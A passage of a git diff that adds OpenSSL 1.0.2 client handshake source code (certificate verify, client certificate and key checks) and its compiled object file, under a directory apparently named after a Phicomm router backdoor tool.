+                                                            pre_ms_len);
+            s2n(identity_len, p);
+            memcpy(p, identity, identity_len);
+            n = 2 + identity_len;
+            psk_err = 0;
+ psk_err:
+            OPENSSL_cleanse(identity, sizeof(identity));
+            OPENSSL_cleanse(psk_or_pre_ms, sizeof(psk_or_pre_ms));
+            if (psk_err != 0) {
+                ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_HANDSHAKE_FAILURE);
+                goto err;
+            }
+        }
+#endif
+        else {
+            ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_HANDSHAKE_FAILURE);
+            SSLerr(SSL_F_SSL3_SEND_CLIENT_KEY_EXCHANGE, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+
+        ssl_set_handshake_header(s, SSL3_MT_CLIENT_KEY_EXCHANGE, n);
+        s->state = SSL3_ST_CW_KEY_EXCH_B;
+    }
+
+    /* SSL3_ST_CW_KEY_EXCH_B */
+    return ssl_do_write(s);
+ err:
+#ifndef OPENSSL_NO_ECDH
+    BN_CTX_free(bn_ctx);
+    if (encodedPoint != NULL)
+        OPENSSL_free(encodedPoint);
+    if (clnt_ecdh != NULL)
+        EC_KEY_free(clnt_ecdh);
+    EVP_PKEY_free(srvr_pub_pkey);
+#endif
+    return (-1);
+}
+
+int ssl3_send_client_verify(SSL *s)
+{
+    unsigned char *p;
+    unsigned char data[MD5_DIGEST_LENGTH + SHA_DIGEST_LENGTH];
+    EVP_PKEY *pkey;
+    EVP_PKEY_CTX *pctx = NULL;
+    EVP_MD_CTX mctx;
+    unsigned u = 0;
+    unsigned long n;
+    int j;
+
+    EVP_MD_CTX_init(&mctx);
+
+    if (s->state == SSL3_ST_CW_CERT_VRFY_A) {
+        p = ssl_handshake_start(s);
+        pkey = s->cert->key->privatekey;
+/* Create context from key and test if sha1 is allowed as digest */
+        pctx = EVP_PKEY_CTX_new(pkey, NULL);
+        EVP_PKEY_sign_init(pctx);
+        if (EVP_PKEY_CTX_set_signature_md(pctx, EVP_sha1()) > 0) {
+            if (!SSL_USE_SIGALGS(s))
+                s->method->ssl3_enc->cert_verify_mac(s,
+                                                     NID_sha1,
+                                                     &(data
+                                                       [MD5_DIGEST_LENGTH]));
+        } else {
+            ERR_clear_error();
+        }
+        /*
+         * For TLS v1.2 send signature algorithm and signature using agreed
+         * digest and cached handshake records.
+         */
+        if (SSL_USE_SIGALGS(s)) {
+            long hdatalen = 0;
+            void *hdata;
+            const EVP_MD *md = s->cert->key->digest;
+            hdatalen = BIO_get_mem_data(s->s3->handshake_buffer, &hdata);
+            if (hdatalen <= 0 || !tls12_get_sigandhash(p, pkey, md)) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY, ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+            p += 2;
+#ifdef SSL_DEBUG
+            fprintf(stderr, "Using TLS 1.2 with client alg %s\n",
+                    EVP_MD_name(md));
+#endif
+            if (!EVP_SignInit_ex(&mctx, md, NULL)
+                || !EVP_SignUpdate(&mctx, hdata, hdatalen)
+                || !EVP_SignFinal(&mctx, p + 2, &u, pkey)) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY, ERR_R_EVP_LIB);
+                goto err;
+            }
+            s2n(u, p);
+            n = u + 4;
+            if (!ssl3_digest_cached_records(s))
+                goto err;
+        } else
+#ifndef OPENSSL_NO_RSA
+        if (pkey->type == EVP_PKEY_RSA) {
+            s->method->ssl3_enc->cert_verify_mac(s, NID_md5, &(data[0]));
+            if (RSA_sign(NID_md5_sha1, data,
+                         MD5_DIGEST_LENGTH + SHA_DIGEST_LENGTH,
+                         &(p[2]), &u, pkey->pkey.rsa) <= 0) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY, ERR_R_RSA_LIB);
+                goto err;
+            }
+            s2n(u, p);
+            n = u + 2;
+        } else
+#endif
+#ifndef OPENSSL_NO_DSA
+        if (pkey->type == EVP_PKEY_DSA) {
+            if (!DSA_sign(pkey->save_type,
+                          &(data[MD5_DIGEST_LENGTH]),
+                          SHA_DIGEST_LENGTH, &(p[2]),
+                          (unsigned int *)&j, pkey->pkey.dsa)) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY, ERR_R_DSA_LIB);
+                goto err;
+            }
+            s2n(j, p);
+            n = j + 2;
+        } else
+#endif
+#ifndef OPENSSL_NO_ECDSA
+        if (pkey->type == EVP_PKEY_EC) {
+            if (!ECDSA_sign(pkey->save_type,
+                            &(data[MD5_DIGEST_LENGTH]),
+                            SHA_DIGEST_LENGTH, &(p[2]),
+                            (unsigned int *)&j, pkey->pkey.ec)) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY, ERR_R_ECDSA_LIB);
+                goto err;
+            }
+            s2n(j, p);
+            n = j + 2;
+        } else
+#endif
+        if (pkey->type == NID_id_GostR3410_94
+                || pkey->type == NID_id_GostR3410_2001) {
+            unsigned char signbuf[64];
+            int i;
+            size_t sigsize = 64;
+            s->method->ssl3_enc->cert_verify_mac(s,
+                                                 NID_id_GostR3411_94, data);
+            if (EVP_PKEY_sign(pctx, signbuf, &sigsize, data, 32) <= 0) {
+                SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY, ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+            for (i = 63, j = 0; i >= 0; j++, i--) {
+                p[2 + j] = signbuf[i];
+            }
+            s2n(j, p);
+            n = j + 2;
+        } else {
+            SSLerr(SSL_F_SSL3_SEND_CLIENT_VERIFY, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+        ssl_set_handshake_header(s, SSL3_MT_CERTIFICATE_VERIFY, n);
+        s->state = SSL3_ST_CW_CERT_VRFY_B;
+    }
+    EVP_MD_CTX_cleanup(&mctx);
+    EVP_PKEY_CTX_free(pctx);
+    return ssl_do_write(s);
+ err:
+    EVP_MD_CTX_cleanup(&mctx);
+    EVP_PKEY_CTX_free(pctx);
+    return (-1);
+}
+
+/*
+ * Check a certificate can be used for client authentication. Currently check
+ * cert exists, if we have a suitable digest for TLS 1.2 if static DH client
+ * certificates can be used and optionally checks suitability for Suite B.
+ */
+static int ssl3_check_client_certificate(SSL *s)
+{
+    unsigned long alg_k;
+    if (!s->cert || !s->cert->key->x509 || !s->cert->key->privatekey)
+        return 0;
+    /* If no suitable signature algorithm can't use certificate */
+    if (SSL_USE_SIGALGS(s) && !s->cert->key->digest)
+        return 0;
+    /*
+     * If strict mode check suitability of chain before using it. This also
+     * adjusts suite B digest if necessary.
+     */
+    if (s->cert->cert_flags & SSL_CERT_FLAGS_CHECK_TLS_STRICT &&
+        !tls1_check_chain(s, NULL, NULL, NULL, -2))
+        return 0;
+    alg_k = s->s3->tmp.new_cipher->algorithm_mkey;
+    /* See if we can use client certificate for fixed DH */
+    if (alg_k & (SSL_kDHr | SSL_kDHd)) {
+        SESS_CERT *scert = s->session->sess_cert;
+        int i = scert->peer_cert_type;
+        EVP_PKEY *clkey = NULL, *spkey = NULL;
+        clkey = s->cert->key->privatekey;
+        /* If client key not DH assume it can be used */
+        if (EVP_PKEY_id(clkey) != EVP_PKEY_DH)
+            return 1;
+        if (i >= 0)
+            spkey = X509_get_pubkey(scert->peer_pkeys[i].x509);
+        if (spkey) {
+            /* Compare server and client parameters */
+            i = EVP_PKEY_cmp_parameters(clkey, spkey);
+            EVP_PKEY_free(spkey);
+            if (i != 1)
+                return 0;
+        }
+        s->s3->flags |= TLS1_FLAGS_SKIP_CERT_VERIFY;
+    }
+    return 1;
+}
+
+int ssl3_send_client_certificate(SSL *s)
+{
+    X509 *x509 = NULL;
+    EVP_PKEY *pkey = NULL;
+    int i;
+
+    if (s->state == SSL3_ST_CW_CERT_A) {
+        /* Let cert callback update client certificates if required */
+        if (s->cert->cert_cb) {
+            i = s->cert->cert_cb(s, s->cert->cert_cb_arg);
+            if (i < 0) {
+                s->rwstate = SSL_X509_LOOKUP;
+                return -1;
+            }
+            if (i == 0) {
+                ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_INTERNAL_ERROR);
+                return 0;
+            }
+            s->rwstate = SSL_NOTHING;
+        }
+        if (ssl3_check_client_certificate(s))
+            s->state = SSL3_ST_CW_CERT_C;
+        else
+            s->state = SSL3_ST_CW_CERT_B;
+    }
+
+    /* We need to get a client cert */
+    if (s->state == SSL3_ST_CW_CERT_B) {
+        /*
+         * If we get an error, we need to ssl->rwstate=SSL_X509_LOOKUP;
+         * return(-1); We then get retied later
+         */
+        i = 0;
+        i = ssl_do_client_cert_cb(s, &x509, &pkey);
+        if (i < 0) {
+            s->rwstate = SSL_X509_LOOKUP;
+            return (-1);
+        }
+        s->rwstate = SSL_NOTHING;
+        if ((i == 1) && (pkey != NULL) && (x509 != NULL)) {
+            s->state = SSL3_ST_CW_CERT_B;
+            if (!SSL_use_certificate(s, x509) || !SSL_use_PrivateKey(s, pkey))
+                i = 0;
+        } else if (i == 1) {
+            i = 0;
+            SSLerr(SSL_F_SSL3_SEND_CLIENT_CERTIFICATE,
+                   SSL_R_BAD_DATA_RETURNED_BY_CALLBACK);
+        }
+
+        if (x509 != NULL)
+            X509_free(x509);
+        if (pkey != NULL)
+            EVP_PKEY_free(pkey);
+        if (i && !ssl3_check_client_certificate(s))
+            i = 0;
+        if (i == 0) {
+            if (s->version == SSL3_VERSION) {
+                s->s3->tmp.cert_req = 0;
+                ssl3_send_alert(s, SSL3_AL_WARNING, SSL_AD_NO_CERTIFICATE);
+                return (1);
+            } else {
+                s->s3->tmp.cert_req = 2;
+            }
+        }
+
+        /* Ok, we have a cert */
+        s->state = SSL3_ST_CW_CERT_C;
+    }
+
+    if (s->state == SSL3_ST_CW_CERT_C) {
+        s->state = SSL3_ST_CW_CERT_D;
+        if (!ssl3_output_cert_chain(s,
+                                    (s->s3->tmp.cert_req ==
+                                     2) ? NULL : s->cert->key)) {
+            SSLerr(SSL_F_SSL3_SEND_CLIENT_CERTIFICATE, ERR_R_INTERNAL_ERROR);
+            ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_INTERNAL_ERROR);
+            return 0;
+        }
+    }
+    /* SSL3_ST_CW_CERT_D */
+    return ssl_do_write(s);
+}
+
+#define has_bits(i,m)   (((i)&(m)) == (m))
+
+int ssl3_check_cert_and_algorithm(SSL *s)
+{
+    int i, idx;
+    long alg_k, alg_a;
+    EVP_PKEY *pkey = NULL;
+    SESS_CERT *sc;
+#ifndef OPENSSL_NO_RSA
+    RSA *rsa;
+#endif
+#ifndef OPENSSL_NO_DH
+    DH *dh;
+#endif
+
+    alg_k = s->s3->tmp.new_cipher->algorithm_mkey;
+    alg_a = s->s3->tmp.new_cipher->algorithm_auth;
+
+    /* we don't have a certificate */
+    if ((alg_a & (SSL_aNULL | SSL_aKRB5)) || (alg_k & SSL_kPSK))
+        return (1);
+
+    sc = s->session->sess_cert;
+    if (sc == NULL) {
+        SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM, ERR_R_INTERNAL_ERROR);
+        goto err;
+    }
+#ifndef OPENSSL_NO_RSA
+    rsa = s->session->sess_cert->peer_rsa_tmp;
+#endif
+#ifndef OPENSSL_NO_DH
+    dh = s->session->sess_cert->peer_dh_tmp;
+#endif
+
+    /* This is the passed certificate */
+
+    idx = sc->peer_cert_type;
+#ifndef OPENSSL_NO_ECDH
+    if (idx == SSL_PKEY_ECC) {
+        if (ssl_check_srvr_ecc_cert_and_alg(sc->peer_pkeys[idx].x509, s) == 0) {
+            /* check failed */
+            SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM, SSL_R_BAD_ECC_CERT);
+            goto f_err;
+        } else {
+            return 1;
+        }
+    } else if (alg_a & SSL_aECDSA) {
+        SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,
+               SSL_R_MISSING_ECDSA_SIGNING_CERT);
+        goto f_err;
+    } else if (alg_k & (SSL_kECDHr | SSL_kECDHe)) {
+        SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM, SSL_R_MISSING_ECDH_CERT);
+        goto f_err;
+    }
+#endif
+    pkey = X509_get_pubkey(sc->peer_pkeys[idx].x509);
+    i = X509_certificate_type(sc->peer_pkeys[idx].x509, pkey);
+    EVP_PKEY_free(pkey);
+
+    /* Check that we have a certificate if we require one */
+    if ((alg_a & SSL_aRSA) && !has_bits(i, EVP_PK_RSA | EVP_PKT_SIGN)) {
+        SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,
+               SSL_R_MISSING_RSA_SIGNING_CERT);
+        goto f_err;
+    }
+#ifndef OPENSSL_NO_DSA
+    else if ((alg_a & SSL_aDSS) && !has_bits(i, EVP_PK_DSA | EVP_PKT_SIGN)) {
+        SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,
+               SSL_R_MISSING_DSA_SIGNING_CERT);
+        goto f_err;
+    }
+#endif
+#ifndef OPENSSL_NO_RSA
+    if ((alg_k & SSL_kRSA) &&
+        !(has_bits(i, EVP_PK_RSA | EVP_PKT_ENC) || (rsa != NULL))) {
+        SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,
+               SSL_R_MISSING_RSA_ENCRYPTING_CERT);
+        goto f_err;
+    }
+#endif
+#ifndef OPENSSL_NO_DH
+    if ((alg_k & SSL_kEDH) &&
+        !(has_bits(i, EVP_PK_DH | EVP_PKT_EXCH) || (dh != NULL))) {
+        SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM, SSL_R_MISSING_DH_KEY);
+        goto f_err;
+    } else if ((alg_k & SSL_kDHr) && !SSL_USE_SIGALGS(s) &&
+               !has_bits(i, EVP_PK_DH | EVP_PKS_RSA)) {
+        SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,
+               SSL_R_MISSING_DH_RSA_CERT);
+        goto f_err;
+    }
+# ifndef OPENSSL_NO_DSA
+    else if ((alg_k & SSL_kDHd) && !SSL_USE_SIGALGS(s) &&
+             !has_bits(i, EVP_PK_DH | EVP_PKS_DSA)) {
+        SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,
+               SSL_R_MISSING_DH_DSA_CERT);
+        goto f_err;
+    }
+# endif
+#endif
+
+    if (SSL_C_IS_EXPORT(s->s3->tmp.new_cipher) && !has_bits(i, EVP_PKT_EXP)) {
+#ifndef OPENSSL_NO_RSA
+        if (alg_k & SSL_kRSA) {
+            if (rsa == NULL
+                || RSA_size(rsa) * 8 >
+                SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher)) {
+                SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,
+                       SSL_R_MISSING_EXPORT_TMP_RSA_KEY);
+                goto f_err;
+            }
+        } else
+#endif
+#ifndef OPENSSL_NO_DH
+        if (alg_k & (SSL_kEDH | SSL_kDHr | SSL_kDHd)) {
+            if (dh == NULL
+                || DH_size(dh) * 8 >
+                SSL_C_EXPORT_PKEYLENGTH(s->s3->tmp.new_cipher)) {
+                SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,
+                       SSL_R_MISSING_EXPORT_TMP_DH_KEY);
+                goto f_err;
+            }
+        } else
+#endif
+        {
+            SSLerr(SSL_F_SSL3_CHECK_CERT_AND_ALGORITHM,
+                   SSL_R_UNKNOWN_KEY_EXCHANGE_TYPE);
+            goto f_err;
+        }
+    }
+    return (1);
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_HANDSHAKE_FAILURE);
+ err:
+    return (0);
+}
+
+#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
+int ssl3_send_next_proto(SSL *s)
+{
+    unsigned int len, padding_len;
+    unsigned char *d;
+
+    if (s->state == SSL3_ST_CW_NEXT_PROTO_A) {
+        len = s->next_proto_negotiated_len;
+        padding_len = 32 - ((len + 2) % 32);
+        d = (unsigned char *)s->init_buf->data;
+        d[4] = len;
+        memcpy(d + 5, s->next_proto_negotiated, len);
+        d[5 + len] = padding_len;
+        memset(d + 6 + len, 0, padding_len);
+        *(d++) = SSL3_MT_NEXT_PROTO;
+        l2n3(2 + len + padding_len, d);
+        s->state = SSL3_ST_CW_NEXT_PROTO_B;
+        s->init_num = 4 + 2 + len + padding_len;
+        s->init_off = 0;
+    }
+
+    return ssl3_do_write(s, SSL3_RT_HANDSHAKE);
+}
+#endif                          /* !OPENSSL_NO_TLSEXT &&
+                                 * !OPENSSL_NO_NEXTPROTONEG */
+
+int ssl_do_client_cert_cb(SSL *s, X509 **px509, EVP_PKEY **ppkey)
+{
+    int i = 0;
+#ifndef OPENSSL_NO_ENGINE
+    if (s->ctx->client_cert_engine) {
+        i = ENGINE_load_ssl_client_cert(s->ctx->client_cert_engine, s,
+                                        SSL_get_client_CA_list(s),
+                                        px509, ppkey, NULL, NULL, NULL);
+        if (i != 0)
+            return i;
+    }
+#endif
+    if (s->ctx->client_cert_cb)
+        i = s->ctx->client_cert_cb(s, px509, ppkey);
+    return i;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_clnt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_clnt.o
new file mode 100644
index 0000000000000000000000000000000000000000..adc40432304facad29234c29283462fe1367e624
GIT binary patch
literal 31984
zcmdsgdwf*Ywf~t(fI%@65H-F>i4{aK16Y$*Gy^kmq7#Wc6rV%LgQVou<O~KCNtgt3
zJPe}0OKYp%QfqIuwUyfk#8g9g8MLiescotD-bQLG)6wFsH6W<-`>uWV&a4b`?&tnq
z|NQpHnc3&N*Is+=wbx#I?Y&QMT_`-??Q&@<xwPxG^piq0?ZftTzEosOwS3L1edN99
zL}yCN(X>87_4pX^;|=ZEOGUc%Mcuj~Auwwran`#Byj`CXsg<wCzNC4(j?zQyJ`b|*
zA{$s5Sh94nZl1hFw-$PI%RB&ZIMCuY@<5fZMaTIE5<dZUtaO<R4M)$`tyl-1b*tkU
z$T3`6FxFU>JkS4%|Db<3(EE8RmD0^W9sz~cJrF&Z8~}Y0Bney3Y!TIBLM}@yt7`Ow
zt>vDu`JSMT9ls#z?fziRB-KF7liy3qNnWe3`k=VXdf=)8L8zPi(JkW;D(dFT5;__%
z_layE^-FKJ4k?m5@3`~sz+Hj6_xcBH?bzB9`M|BB<GT6TVm<bLezk7pUN)7)GlPX5
z|3K$DJ%6I64F(Hy0czgvJ#Ompf{L(J2PJK!4v`F(TNjrUL@$Z82Q}mTSnnnxj-mr0
zPiJu|<wC_Lfj~RMx_Q(V&m4#yNQI!9-zPc+)9%N>%-c6~e%n&r+DghfHg}l@RT~pR
z{sI3heKA1Ed{CU%c8QIg2Bbd*&bub#OYjBLgdhCG!(d2DeNLSTd6H*~isJ=N0Lnf?
znHAE^?w^7W35#|+zz9Qn06*dQ`hEBrE^YA`XZZ&@UUbu=7Cm224d}7szUT)p`0yMy
z_oTa}TT8(uRH0js5{sa<!U*Rq_gJEdviMzvQ@lI&1$uG|Z6weWEOhBscL!*_`5nYR
z;GGyObbIrA-n1XWg_B}yuhR@q;N@W9rCPEG<U;LLdN9xvF1)n+72|@~CqD1P|3C#*
zX#P=;x9A@|4TH8jCVC{g5&}&RNUbfo&{O9L(zJKuP9QyJ>ekPwNRQ8R>E@udnJDzw
z%ei1=Z55TiDInKgHIDvQ^!Q>oo|Fk<M7{Rt{0y8DcVi-$d-TUZvElD}JecDS$6MUB
z=9#sFX!r<7Fg@1E8i%RIbkxw};lkXq_*Siy^gCiSFtw=9T2h$X54kX`wkg@I1*z`Q
z&r+%Iw4r`<iHdc!EQVF|K2^~^7}6)go&|_vdz@2SI*8o5tI$)e&$>X^zcEILrpNZ>
z+mk17k3C;*8$Dx+!`4nx;HZf+)jxna0z24p0E~y{!hTL0+_)WNBv<T}R2bcx+;<5{
zVjd0j`fi39`|y;iSRQ+za5B)n-mahKN<po-E#G$HW<9cvyv=;@yn3*kcv6a;$cg&o
zxW<aL=(&TPFM^Cph3iPH1hd!)w=t!!6`0Ui|D(vICr;mKcuZUky0F!_%$~Mkv!SrS
zE3Bn9fSCd#ph>!6DCpfeR6FOh&!cB}`wpMqI!-7nd6jO(sm)`7Q|Ij!wR2LRN6!QK
zd99Oe-C`2bKv<d?(vp|689iFCpjo5!%_rd=MVE9dSXf{!)x0~3%r|y_;wgD8I;Ob7
zW%&EZ8D#624udIx@ZKGZT$gDnO&k9@HTaw!*WGHun_=`bztruWxc+Ih<jvP7c_%*f
zQ)Kmc#gxJBXON>5^zLZCR5!seWPTdxNcmPv%e@kfC*bI`&b8#Sv<IU!6KVFqJJw@b
z(UkSS5{?H8ePo#Ms6JvCw&KO08l0bBgeN_ID^{nMC#POVty$DnADR5bfOp3+s+D6D
zO4n~~6+XaRPc~u8hXyoDNQ$+t`*}Qtx>LqVj0uqjOV$LV_vqFGg$3aDrXK&QuA|o;
zF%)Q{S-0?HZS{cm%eT};C+qQ_O+a3cuW67phU{xT;KZ5uO1GPw2NpL-=R>PN^kVs-
zTaXzo{xWE`2ldzhS{?l8>ExMdmx-FcPAmdDQ2j&oQa4ps%glYG1KIX*bSv?7eCbwc
zaas5LqUhOWWD&^bM^C4$57`2>WQ+mZ<SMc<|FA!m+VU9Hgd!i)U8p4b6*m6@kz^O!
z4~&Q{=C0m-&^TSU7Uk>ame)}?_R=%>)(k&Z;lg~qq?bTrifz05k<Xk|R|8ADg)i{!
zz)#rRM$rQEO7O{U1KNT-ur;_{7*|KJW}Ig;r64K!EM%4vMt_r>ru5u90FIjBvniK=
zGPC&#lqc`e<4~sg`>^>}#^-#y)}KI;Q7ieSuq!FthF)@4VSzEDuMI?kJcF`tCe`M?
z7|Sm?(y3V-X|Zyofrxaa@PvJSxV`=&eA#}r%={ElSnPfH)s4@fL)rW)dCv=MS9t-s
z%BTl1PhulHSDE!sg&h#dT2D?gc6@??7~~-lo&|h9<Gk4Myy#hj>y>K^yoeUGL^=7!
z<EI-}+8QAT*}nx}!Z(KeAB12#9|-jab_pl>E|`~D4TZ}DSZ2OV1}cppkXc(+P3%J@
zxQ|Bop^&R=_n-6i-9w(T@%!=U#!p#1l%tm%icX}Z&!^+b|F&*UC`?YYrTP~5CIiAH
zgiDg%*vEMG?#L&H<kEK^&M({jo+mv11U<X)8;-Z<=<&PG%mMN0X*P?E4x$Bi(J&_R
zAfRr|F7zXAT~df}^npU3=pZ>z54xzE`=ioLpOMKbu<Hsyf;_Pw22mEzJx4FWY&0%%
zXk5@HW4igbuz5^8klQ*R0jphMv?6WJYrz@efQpm@u@?(VX$XyL5kt%>vtBH0!6SxD
zD&6L^VU(}|IoT5zftg?{zR)>z(c5(%32${33ioRDk{#%9qjor;3Lr80FA>Ox&8W==
zUIeBfn3b9PiL`?%k8BU}jj_X}K40{*^6n3!GNh$VNb<Tcf`DDr4^bJee@t>H<WGgu
zs?n<sb-%r4CLFrA>vYjY3W$%P3b)j>nW7U~Vh#~fjo;%bEl)4a2ia2lRV8~3X&&o9
zp201!i~N_MO^~SO-JbIJgBJvPk73H_ak2u8N2(7DH4$?OQhn9lVk|Uc3et+xSG`?~
z;P1kMuxVUafbctCsZzIkg;O5UaiBK`n>oo`a7GJh=Bi%U+)nk9*D3(A>4Tws66qA4
zibfyoph}b!L@vWN8fedU2=MjWK#@E*Xr2(xP1##A2c{K>{SqT%yJO`}b?X}9sSKHB
zDS1G9E0qo<i-YD+RwsB1Il+qm6DPRe+jSOmfP?D?XiSilE6j_|)MI_ZtBbF+7xZ?$
z4O-Pl%z>=~-W>ypmjT9(pJ7}i0>e>yu&32n*h_L&p!2#y5%A2>t@ZXs*q3V*IaMM9
z=_f~&4m=Zgpd~#%XWoaYRQZTk)y>>Oa;tKp1W+aUGMuC<<lPa4*T?phhLFO|a`PBQ
z+y|Q{gR@t4RfZ9#0!o3{=i^r|4w}dM{yvVz{|Ql9kBgxbhFcboy29osf&TFz*UcE!
z9ARV$Mk0DqSlH~H3KIW7u;jzG3jz-rV_ap{ros-?#>OKxP}=j;i3iZR<R1~*gkYA~
zVd$>C6r~{YRXZ}bw~Hc&TI<Yk{C;=XJig)Y;b}*_JKw^DDRAp0M^;~wUT4)X*+W2q
za^iBRfSM&$VB;|ubhQB12D@D3yeJ{;D%R%=pgcM>yvJoY@~Z<$;&-Uw-FYx<ey$pW
zNBR}=Vb@8aCXC8CeHEY@WfY0MK+p+2w%0AzFnBQCJS2il(Ie~`{u*{2(M$Fl)15jb
zR=L}C>$*bOlF?FL@|kzT`-1m$;$6FYzsI}tgYx(TSG&tgj;_8lFx*x6I0W~3y9Yq#
z#JUS*8I~uf?MQQp*FlqBeUh(J@aoaczfw=`Qmdi8+)o>6Hd^k~B>BgrrMr^)mr>i>
zRfxsSi8cn>#9bh;EpcS^=sg4j3Yyy~d>HJYS&gm=L!ThU&!{k=P&a$1l9=X6H|<5k
z!W~V>*x8;Eklh;S)k-z(1vnC|?;UbSOZ$iDXUS5h10vezQaqMx$78uTO<N8DaXd0+
zU6HLy8q@ys0j8&XS_#U7CjNtZWvyK%w@Tg}-f(>7Sbg_9SS>aeptg6%Z6eUo$G?$A
z+z5R<`uJCM^J_NE!kqL|ZP04Ytqs6lLf)Mp2jaJm)vFHbC40QxRnW6;_0wL5T*f&<
zg)*v!$Dj=kCEa?G!hpWG2YK61z<t=nW=zzUXE9cX&1)bk!<_)CXLK5&adH79`2aoy
zn~t!Vpi>obmJ>Fgp*98Q5O#^Q@V|$>DYaf^4(Rb4v31&`i*hln|INdSC2~N|hBSTu
ziIH5|{~^Br7Y1`8B*0+i+$;UCn4mZ&TDq*`OD?tXDFadeCHTr1Vc`<IJMM6Kcif0$
zpB1?nPLIC(Px<=zUjV{T{Q`$axfqh@w{`2K<J8tj9H5*3q5O|-cH3n*{pky!FT$`g
zTO^N^Tmr3;0h&*0@XT0}h6K}r=s2ObWKg$$e1stLC~dOAPsdYMeqSYixoZZKn}nZJ
zmMV5Qa0^)9XJ<?(aa3d<vBut?8tA<U9A3!7S6?NxK58pdAdiR;WQ+MTxqmrGM$Uh*
zyTqnuz_>Ob#KuDS;Fak~BkhDjKry)<K@(}!2ZV&!PG&|RL0D33-_$JUSe@^;Lkmp6
zuEIJ1;{3M*a(TO>6q8xEVcA-cdA6xr8#^F?40N$CFL=h~?K+#3EDwmS4qAysczqPU
z1t;K#P)cDi4l~>3iH12S2wnq0taz-qd%vKp^MTCU)r$ww>stHVRF6MU_?7+{;JRU`
z7O_B`C`9bC`Fo(0vq~Ptgw4Z)rQ&$y!7*j=C55m=qp;3aEGFTuB5=W`LU1tmrVk_U
z1)eAaJ9VUU+J+%oe*zSl(5a$%^aZ=_-^12-X{yRKy$t*(rz#5i?b2fb2$(O}C-T7V
znLKaTchcGk+nbE??o^b8T7um6pLDF7*bRqXZtWy%F7F<W&Mm82;6ZnLz6D%gH9)rl
z<7DI`H!|H+BKJCoSJl=8wY^>SRAwJY3~TuY9Vlo*BB1Tq>S50?A0$Eu>}4=8(W1m`
zAS%L@pgfd;ZD@&$S$hZ=E-$lI`*7l*=5SeT7YVP?c3pAletX>)>^>5QehSUgW~^fD
z#Banz4&jbO9HN=OhvG4&Bg$S)x~9{O_xx`M%=!8LfsekQ?p$<6nYGp@dh&t?4bb4Y
zV*}&9aqJUwZ+bvSh(?;NLbJFs81Ic;DFm?ZI;1IEz1v7%7_;*cdeU5>yi~`HcueG@
zl4#XG9EPz@#ZXX4D<I^dK#}eDK_+Z)Y}_7_Sg#1)4Om%vSXwYF!^T7<9?aC<l8TDE
zra}2?gwunLGedbTWHauw8#|`Qx9>x<yiHd0v?`)?UDq*VF2I0=&DX*s=Y?tj!*pgC
zdyV!(fnE>l2^IH|EeYn`18byCCXr6){w?rwZebA}NYx?IMm^&1!x1=&=*$m$I2;<J
z@FW?u@1o-epB;(CPOMvf5#58hIt5x54;JPGdN8LETKi&qbCMJ3$wg08=B8K_GWwts
ztgEqCQy)DY=*7rrw$Lw7RyOn?&iT4K@T}v$O{rPV^RRhBPVpCfL}AD7YMxX4n4aUw
ztNNybMywfvwQb=+!bV#-1q8E23st}F&nLc6hrE&yR~4Oby;1^&%d3hfgnvHekganc
z`SDY>nD)_H$p5Y##&y1b0F90E_Pqf71LPQe&_BsCGSxfR>RZGTa7au8`+5tfANB>8
zb%&wnEW@&(ER`+>N3=(FZr?^KO+fE2Ktvep?!M!qmG?vu7Pu**tLbe~^c=E{>i$xY
zK{Kg};-tKk5m!1r)Cszv^>)2V6jB1%Y=Qq^Kjs4<EH&-<YFMpaT1!Q1V*5zT&E_`&
z(de3gOJCM{yXd&VZ|{KA(Uh9pW5GD_l;FOEc5ygaRkHzJ?`;w}UyrxtVr60YUTpbr
zhJ3WA%1ybRc{%hGjMwGL-g~=mN1KUn;)^a?V#miuo5*i0>Bove-G`8=TZ+rAa-SZ*
z2}>BN_Z6ZD+q7MDVk!Bolkq3j>i-75(hgOe2Z`3F*fO}J4DQ6ggD`g7h<-6(t<6<!
z&?K#<h9>t-PB)-7<a7|4d=eZcC)Zvz9qNu9cX>B<0~KP2;|+!F{p6O&s9{qDrBoz3
zK{|rcF#G>zPkgmTzz7zAlv>mJZon6@4?Gk;OVd-Y#s=K_V?7f{ag$R6SW+kJu@kB2
zA9|=alY8b-Zze;d?((V+lG5wYq)U8E_lYnWEJpoa03;BfWsktR)lex(vdy~WnVD1~
z(0ZbfCQp{BNcQP46~z&Efu0dKRrtcza%^|r2%AH(cM2~POY->L#%W}?TB26WKYJN6
zKSLL`P-n0-%OR)E_OHhm8**_2RfYK}PIRqaio3$rc3O$WksR)Et@~vFh72w1a>>9P
